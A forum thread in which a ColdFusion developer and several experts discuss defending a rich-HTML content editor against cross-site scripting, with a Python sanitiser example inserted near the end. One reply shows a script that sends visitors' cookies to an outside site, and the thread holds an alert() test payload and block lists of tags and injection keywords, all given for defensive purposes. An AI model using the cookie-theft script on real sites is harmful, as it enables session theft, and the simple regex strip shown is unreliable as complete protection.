Solved

question about HTMLEditFormat()

Posted on 2011-03-04
Last Modified: 2012-06-22
I'm concerned about XSS attacks. I did some reading about, and have tried to implement, the HTMLEditFormat() function.

However, when I use HTMLEditFormat() in a form input, or in a CFOUTPUT, the output on the page is the raw HTML code.

For example, if I do this:

<cfquery name="UpdatePage" datasource="#ds#">
    UPDATE tbl_acct_navigation
    SET
        PageTitle = <cfqueryparam cfsqltype="cf_sql_varchar" value="#HTMLEditFormat(form.PageTitle)#">,
        PageContentLeft = <cfqueryparam cfsqltype="cf_sql_varchar" value="#HTMLEditFormat(form.PageContentLeft)#">,
        PageContentRight = <cfqueryparam cfsqltype="cf_sql_varchar" value="#HTMLEditFormat(form.PageContentRight)#">,
        DateModified = <cfqueryparam cfsqltype="cf_sql_timestamp" value="#now()#">
    WHERE PageID = <cfqueryparam cfsqltype="cf_sql_integer" value="#val(form.PageID)#">
</cfquery>


... then the page output displays the HTML code; the HTML is not parsed by the browser. You can see it here:

http://www.coalcountryteam.org/index.cfm?PageID=76

Where should I implement HTMLEditFormat() to add a little protection against XSS attacks?

Sorry to be asking so many questions of late. =) I really appreciate people's time.

Eric B
0
Question by:Eric Bourland
26 Comments
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35041561
0
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35041566

The first question is, what do you want the user to be able to enter into your form?

If you can say, no HTML at all, then you just need a regular expression that strips out any invalid characters such as < > tags..

If you keep the data from getting submitted by the form, then it's easier to handle displaying it back on the page
0
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35041578
>  the HTML is not parsed by the browser. You can see it here:

I think you don't realize it, but this IS the desired result.


 Test Page
<p>"Testing" &amp; &lt;script&gt;</p>


You have done exactly what you intended to do, you have prevented this code from being executed and harming your site.

The only problem MAY be, that you are keeping simple commands such as bold and italic from being used.  That's the question of my first post, if you don't want these, then you are all set.  If you do, you need more intelligent filtering to try and allow some HTML command and not the other tags.

Or you can do like EE does, see the icons at the top of the dialog boxes?   Then enter "fake" HTML-like commands such as [ bold ] and [ underline ].  Then in your code, you translate this into a real HTML bold tag..

Just depends on what you want..   some tags, no tags..


0
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35041673
Darn. I just typed a careful reply here, and lost it when I tried to include a screencast. ~sigh~

gdemaria it is good to hear from you.

I want to include almost all HTML. I use the TinyMCE editor to allow this client to enter content and update her web pages. I also need to use a wide range of HTML tags, so I don't want to block any valid HTML tags.

I would like to block stuff like <script>/remotehost/terriblescript.js</script>

So I don't know if the HTMLEditFormat function is what I need. The Nadel article was great -- I like his blog a lot -- but Nadel mentions that developers need to be careful about escaping necessary HTML. (There are also some interesting notes about the vulnerabilities of scriptProtect. I have disabled scriptProtect in application.cfc, so that my client can embed video and slideshows using EMBED and OBJECT tags. Yet I wonder if in doing so I have made my application more vulnerable.)

So, I have been reading about XSS vulnerabilities, and I want to secure my application against them as much as I can; however, I don't know if HTMLEditFormat is what I need.

HTMLEditFormat makes my test page display HTML code -- which makes sense, given the way that I have used it.

Is HTMLEditFormat the right solution for this task? Is there a better way to block:

<script>/remotehost/terriblescript.js</script>

Thank you again. Hope you are well.

Eric
0
 
LVL 15

Assisted Solution

by:myselfrandhawa
myselfrandhawa earned 25 total points
ID: 35041855
here is one script that can really help you with your XSS attacks!

in Application.cfm write this function

<cfset request.XSSAttacks = "(script)|(<)|(>)|(%3c)|(%3e)|(SELECT) |(UPDATE) |(INSERT) |(DELETE)|(GRANT) |(REVOKE)|(UNION)|(&lt;)|(&gt;)">

Now in your action Pages! Do something like this!

<!--- the pattern is the variable set in Application.cfm, not a quoted string --->
<cfif REFindNoCase(request.XSSAttacks, form.comments)>
    XSS Attack Found! Stop Processing
    <cfabort>
<cfelse>
    Continue
</cfif>

0
 
LVL 39

Accepted Solution

by:
gdemaria earned 400 total points
ID: 35043537
> HTMLEditFormat makes my test page display HTML code

Exactly, so you don't want to use it because you do want to keep most of your HTML.


When a user submits their content, then you can strip out any <script> tags using something like this...

<cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>", "", "all")>

change "text" to your form variable


myselfrandhawa, your script is too restrictive.  It will block too much.   Even if the user enters simple text like "The teachers' union will update the parents about the new grant proposal"





0
 
LVL 11

Assisted Solution

by:Brijesh Chauhan
Brijesh Chauhan earned 50 total points
ID: 35043561

Where should I implement HTMLEditFormat() to add a little protection against XSS attacks?

Eric, hopefully you have done your research, XSS attacks are of 3 types,

Persistent
Non-Persistent
and DOM-Based

Let's consider a BLOG where users are allowed to post comments; in the comment I can post the below script, which sends your cookies to another website

<script type="text/javascript">
document.location='http://www.yoursite.com?' + document.cookie;
</script>



so to stop this you can use HTMLEditFormat()

and the above code will become

&lt;script type=&quot;text/javascript&quot;&gt;
document.location='http://www.evilsite.com?' + document.cookie;
&lt;/script&gt;



and will NOT execute..


<cfoutput>#HTMLEditFormat(qBlogComments.comment)#</cfoutput>

Another method for reducing XSS vulnerability is to enable script protection. This can be done globally in the ColdFusion Administrator, or on a per-application basis in Application.cfc.

Script Protection monitors the Form, URL, CGI, and Cookie scopes looking for potentially threatening tags. The tags it looks for are: object, embed, script, applet, and meta. If it finds any of these tags, or any that resemble them, it will replace them with an InvalidTag tag.

To enable Global Script Protection:

   1. Go to your ColdFusion Administrator
   2. Go into the Server Settings section on the left
   3. Under "settings" you will find the check box "Enable Global Script Protection". Check it
   4. Click "Submit Changes"

This turns on Script Protection for All Scopes on All Applications on the server.

If you want to control script protection at the application level, or you do not have access to the ColdFusion Administrator, you can enable it in your Application.cfc by placing this line in the pseudo-constructor area:


<cfset this.scriptprotect="all">



This will enable script protection for only that application, but for all scopes. You can also place a comma delimited list of scopes to protect, if for some reason you do not want to protect them all.

Script Protection, just like HTMLEditFormat(), can also be over-protective, because it will also find tags that are harmless but resemble the potentially dangerous tags.
0
 
LVL 11

Expert Comment

by:Brijesh Chauhan
ID: 35043577
0
 
LVL 39

Expert Comment

by:gdemaria
ID: 35043601

Brijesh, do you actually read anything before making your posts?  

The author wants to have HTML in this post, so cannot use HTMLeditFormat() or script protection, and cannot strip out all HTML as your links state.

Eric, you need to selectively remove the tags that you don't want as I showed in my post

0
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35043630
brijeshchauhan, myselfrandhawa, and gdemaria,

I have a lot to think about, and much more reading and research to do.

I have indeed enabled Global Script Protection in ColdFusion Administrator.

However, in my application.cfc file, I disabled Global Script Protection using:

  <cfset this.scriptProtect = "No">

Why did I do that? Because Script Protection did not let me use EMBED and OBJECT tags, which are required when one wants to embed media from Flickr or Picasa. This feature is very important to this particular client.

This does make me a little nervous. Even though the administrative interface is inside a password protected folder, I don't like to have scriptProtect disabled without using some other kind of protection against XSS.

I will try gdemaria's script; I will also do some more reading as suggested by brijeshchauhan. I really appreciate everybody's very helpful comments. I will get back here later today. Hope you are all having a great day.

Eric
0
 
LVL 11

Expert Comment

by:Brijesh Chauhan
ID: 35043637
The author has mentioned this...

Where should I implement HTMLEditFormat() to add a little protection against XSS attacks?

So just had him show on it...

Anyways, if the post is not useful, then it can be ignored.. it's up to the author..
0
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35043672
brij, I always appreciate your input.

I post many questions in this ColdFusion forum -- and I always get many very helpful replies. I have an abiding gratitude for everybody here.

I'm also aware that I need to contribute more, myself, in areas in which I have more experience: CSS, for example, and support for PC and Macintosh hardware and software.

Thank you for your help. =) I'm going to try gdemaria's Regular Expression Replace idea:

<cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>", "", "all")>

... and see what happens. I have read your replies carefully and I really appreciate your time.

Eric
0
 
LVL 15

Expert Comment

by:myselfrandhawa
ID: 35043702
@ eric, It's all upon your requirements, what exactly you want to try!

My suggestion will be to use all the inputs provided by us and implement them!

My, Brij, gd, all of us have provided you different approaches, so I think you can create a combination of all three and that can help you a lot in making your application secure!

if you want to know more about the stopping of attacks! just read the below:

http://www.coldfusioncookbook.com/entry/36/How-can-I-prevent-SQL-injection-attacks?
0
 
LVL 11

Expert Comment

by:Brijesh Chauhan
ID: 35044235
Eric, there is also one project called AntiSamy, based on Java, which can be used for protecting a website against XSS attacks.. it's open source and can be downloaded from

http://code.google.com/p/owaspantisamy/downloads/list

and its implementation is blogged in the following post

http://blog.pengoworks.com/index.cfm/2008/1/3/Using-AntiSamy-to-protect-your-CFM-pages-from-XSS-hacks

You can give it a try...

0
 
LVL 13

Assisted Solution

by:srikanthmadishetti
srikanthmadishetti earned 25 total points
ID: 35044421
Nice to see a good discussion.

I personally like this

http://www.codfusion.com/blog/page.cfm/projects/portcullis

it has good functions like

filterSQL, filterwords, badSQLContext, escapeChars, isvalidcfvariablename, filterTags

At the starting of the cfc you can see

      <cfset variables.instance.sqlFilter = "select,insert,update,delete,create,drop,alter,declare,execute,--,xp_,sp_sqlexecute,table_cursor,cast\(,exec\(,eval\(,information_schema"/>
      <cfset variables.instance.tagFilter = "script,object,applet,embed,form,input,layer,ilayer,frame,iframe,frameset,param,meta,base,style"/>
      <cfset variables.instance.wordFilter = "onLoad,onClick,onDblClick,onKeyDown,onKeyPress,onKeyUp,onMouseDown,onMouseOut,onMouseUp,onMouseOver,onBlur,onChange,onFocus,onSelect,javascript:,vbscript:,.cookie,.toString,:expr,:expression,.fromCharCode,String."/>

so you can remove from or add to these lists the ones you want, which will be handled in that CFC

hope this helps.

0
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35044462

Eric, you are very gracious and always open and kind.  That makes you a pleasure to help.

Let me be very clear about my concern.  I agree that input from multiple people IS IMPORTANT; it is a core benefit of experts-exchange.  

I get frustrated, however, when moving down a path with an asker and someone posts things that derail the conversation; posts that do not continue down the path towards the resolution.   As you know Eric, your question threads can be very long; each post needs to build upon previous posts until we get to where we need to be.  

As an Example, Brijesh, you provided links to HTMLeditFormat(), Script Protection, stripping out all HTML from form fields.    MySelfrandhawa, suggested stripping out all html and stripping out keywords.  

IMO, none of these are applicable and only slow down the process and add confusion.  

But of course, this is my opinion, and others may disagree.  Having multiple opinions is great for education and helps find creative solutions.   So, given that, I suggest, Brijesh and Myselfrandhawa, that if you're going to post information that is *against* what an expert has suggested or against what the *asker wants*, you need to either (1) say you disagree and why or (2) say that this information is NOT the solution, but may be interesting to read.

I feel like this thread is now in many different directions and will be much harder to resolve.  If you do what Myselfrandhawa suggested and combine all of the suggestions, it will not work and you will just spin your wheels.




0
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35044878
I'm working with gdemaria's idea to use <cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>", "", "all")>

I implemented that code in my edit page -- the page in which the user updates database records. I use this code, below:

 <!--- set up protection against XSS  --->

<cfset form.PageTitle) = ReReplaceNoCase (form.PageTitle), "<script.*?>.*?</script>", "", "all")>
<cfset form.PageContentLeft) = ReReplaceNoCase (form.PageContentLeft), "<script.*?>.*?</script>", "", "all")>
<cfset form.PageContentRight) = ReReplaceNoCase (form.PageContentRight), "<script.*?>.*?</script>", "", "all")>



and I get an error, which I note below.

srikanthmadis, I saw the Portcullis application and it looks very useful -- and that is something I am going to check out further.

brij and myselfrandhawa -- I am going to follow up separately about the excellent resources that you have recommended. I do think that HTMLeditFormat() is not the right solution for this particular problem but I do see that it is very useful in other solutions. I really appreciate your help.

Per gdemaria's notes I am going to first try to get <cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>", "", "all")>
to work. That looks like a very useful solution for this particular problem.

Thanks again to all.

E
error text:

Error Occurred While Processing Request  
Invalid CFML construct found on line 14 at column 22.  
ColdFusion was looking at the following text:<p>)</p><p>The CFML compiler was processing:<ul><li>A cfset tag beginning on line 14, column 2.</ul>  
  
The error occurred in C:/websites/www.coalcountryteam.org/admin/editPages.cfm: line 14
 
12 : 
13 :  <!--- set up protection against XSS scripts --->
14 : <cfset form.PageTitle) = ReReplaceNoCase (form.PageTitle), "<script.*?>.*?</script>", "", "all")>
15 : <cfset form.PageContentLeft) = ReReplaceNoCase (form.PageContentLeft), "<script.*?>.*?</script>", "", "all")>
16 : <cfset form.PageContentRight) = ReReplaceNoCase (form.PageContentRight), "<script.*?>.*?</script>", "", "all")>


0
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35044902
I might need to provide more information about the edit page -- it's simple. I use a CFINPUT tag to update PageTitle:

<p><strong>Page Title:</strong>
    <cfinput
        type="Text"
        name="PageTitle"
        value="#Trim(form.PageTitle)#"
        message="Please enter a Document Title."
        required="Yes"
        validateAt="onSubmit,onServer"
        size="50"
        maxlength="255"></p>



And I use a textarea input field to update Page Content for the left and right sides of the page; example:

<textarea name="PageContentLeft"
          width="770"
          height="800"
          style="width:770px;height:800px;" wrap="virtual">
    <cfoutput>#form.PageContentLeft#</cfoutput>
</textarea>



I implement the TinyMCE javascript editor to apply a WYSIWYG interface to the textarea, for the convenience of the end user.

0
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35045109
Eric, you have a couple of simple typos

In each of the lines, you have a ) before the equal sign and again after the variable name

<cfset form.PageTitle) = ReReplaceNoCase (form.PageTitle), "<script.*?>.*?</script>", "", "all")>
                     ^                                 ^


It should be like this...

<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<script.*?>.*?</script>", "", "all")>

Please check the other lines, they have the same issue..
0
 
LVL 13

Expert Comment

by:srikanthmadishetti
ID: 35045168
Eric ,

You can see the function filterTags in portcullis.cfc

0
 
LVL 15

Expert Comment

by:myselfrandhawa
ID: 35045254
@ all

I have heard a lot about portcullis, never used it, but I will try it now

Thx
0
 
LVL 15

Expert Comment

by:myselfrandhawa
ID: 35045749
One addition to make: check this article by SIDFISH, a CF community guru

http://sidfishes.wordpress.com/2009/03/17/60/
0
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35046402
Eric,

Don't confuse SQL injection attacks with XSS attacks.  You have handled SQL injection in the past.  Focusing on XSS, you don't want to be overly restrictive because you want HTML to be accepted.  However, the Sid Fish article does raise a good point: you should probably block iFrames as well.   But that is first a business decision; when the user enters his own HTML, do you want him/her to be able to put in an iFrame? If not, add that to the cleaning script...

<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<script.*?>.*?</script>", "", "all")>
<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<iframe.*?>.*?</iframe>", "", "all")>

0
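The three defences this thread weighs, HTMLEditFormat()'s escaping, gdemaria's ReReplaceNoCase() tag stripping, and a parser-based tag/attribute filter in the spirit of portcullis.cfc's tagFilter and wordFilter lists, modelled side by side in Python. This is an added example, not code from the thread, from ColdFusion or from portcullis; the HTML samples in its tests are constructed, and the filter goes beyond gdemaria's two lines by also dropping on* handler attributes and javascript:/vbscript: URLs, which the regex leaves untouched.

```python
import html
import re
from html.parser import HTMLParser

# gdemaria's ReReplaceNoCase() expression, plus the on* handlers and
# javascript:/vbscript: URLs that portcullis.cfc's wordFilter list names.
SCRIPT_RE = re.compile(r"<script.*?>.*?</script>", re.I | re.S)
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)
SCRIPT_URL = re.compile(r"^\s*(javascript|vbscript):", re.I)
URL_ATTRS = {"href", "src", "action", "data"}

def html_edit_format(text: str) -> str:
    """The four substitutions ColdFusion's HTMLEditFormat() makes."""
    return (text.replace("&", "&amp;").replace("<", "&lt;")
                .replace(">", "&gt;").replace('"', "&quot;"))

def regex_strip_script(text: str) -> str:
    """ReReplaceNoCase(text, "<script.*?>.*?</script>", "", "all") as a regex."""
    return SCRIPT_RE.sub("", text)

class TagFilter(HTMLParser):
    """Drop blocked elements with their content, on* attributes and script:
    URLs; everything else (embed, object, ...) is re-emitted unchanged."""

    def __init__(self, blocked_tags):
        super().__init__(convert_charrefs=True)
        self.blocked = {t.lower() for t in blocked_tags}
        self.skip_depth = 0         # > 0 while inside a blocked element
        self.out = []

    def _open(self, tag, attrs, close=""):
        parts = [tag]
        for name, value in attrs:   # names arrive lower-cased, values decoded
            if EVENT_ATTR.match(name):
                continue                             # onload, onclick, ...
            if name in URL_ATTRS and value and SCRIPT_URL.match(value):
                continue                             # javascript: URLs
            parts.append(name if value is None
                         else f'{name}="{html.escape(value, quote=True)}"')
        return f"<{' '.join(parts)}{close}>"

    def handle_starttag(self, tag, attrs):
        if tag in self.blocked:
            self.skip_depth += 1
        elif not self.skip_depth:
            self.out.append(self._open(tag, attrs))

    def handle_startendtag(self, tag, attrs):
        if tag not in self.blocked and not self.skip_depth:
            self.out.append(self._open(tag, attrs, " /"))

    def handle_endtag(self, tag):
        if tag in self.blocked:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):    # entities were decoded; re-encode them
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

def filter_tags(html_in: str, blocked_tags=("script", "iframe")) -> str:
    """Sanitise a submission; pass blocked_tags=("script",) to keep iframes."""
    parser = TagFilter(blocked_tags)
    parser.feed(html_in)
    parser.close()
    return "".join(parser.out)
```

The iframe decision gdemaria calls a business decision is the `blocked_tags` argument: the default drops iframes, `("script",)` keeps them for embedded video.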
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35052157
gdemaria,

>>>In each of the lines, you have a ) before the equal sign and again after the variable name

Of course. Thank you. =)

I believe it is working. I tested by typing

"><script>alert("XSS")</script><

into the text update field; then saved the page. Then I view the updated page, but a javascript alert does not pop up, and in the source code the script tags have been removed. However I can paste in all other HTML. This is exactly what I needed.

>>>Don't confuse SQL injection attacks with XSS attacks.

Yep. I understand the difference. We handled a SQL injection in April of 2010 -- I remember it well.

brijeshchauhan and srikanthmadis, I am going to check out portcullis further. At this point I feel I am pretty well protected; I have a password-protected edit page that does not allow the script tag, but allows embed, object, and most other HTML tags.

I also found an option in TinyMCE that strips away selected tags:

invalid_elements : "b,i,script",

I added this line to my TinyMCE initialization code, to disallow the deprecated tags "i" and "b" and the dangerous tag "script".

I'm going to allow iframes for now. YouTube uses them, and this client embeds video from Youtube, so for now I need to accommodate her need for iframes unless a real security problem comes up.

I really appreciate all input. I'm going to close this question, with a lot of gratitude. I would like to award 500 points to everyone who contributed. I will give the majority of the points to gdemaria, who kept this question on task and provided an elegant solution. But I want to stress how grateful I am to myselfrandhawa, srikanthmadis…, and brijeshchauhan. I look forward to working with you again.

My small part of the internet is safer than it was before. ;-)

Eric
0
 
LVL 3

Author Closing Comment

by:Eric Bourland
ID: 35052238
Thank you gdemaria, myselfrandhawa, srikanthmadis…, and brijeshchauhan.

=)

Eric B
0
 
LVL 39

Expert Comment

by:gdemaria
ID: 35056190
> a password-protected edit page

That really helps also; attacks usually don't come from an area that is protected, and you can always identify the culprit :)

0
